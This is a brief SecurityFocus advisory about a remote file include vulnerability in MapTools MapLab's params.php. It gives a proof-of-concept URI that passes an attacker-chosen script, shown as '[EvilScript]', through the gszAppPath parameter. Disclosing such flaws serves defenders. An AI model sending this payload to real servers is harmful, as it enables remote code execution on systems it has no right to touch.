MapTools MapLab Params.PHP Remote File Include Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]


 

Privacy Statement
Copyright 2010, SecurityFocus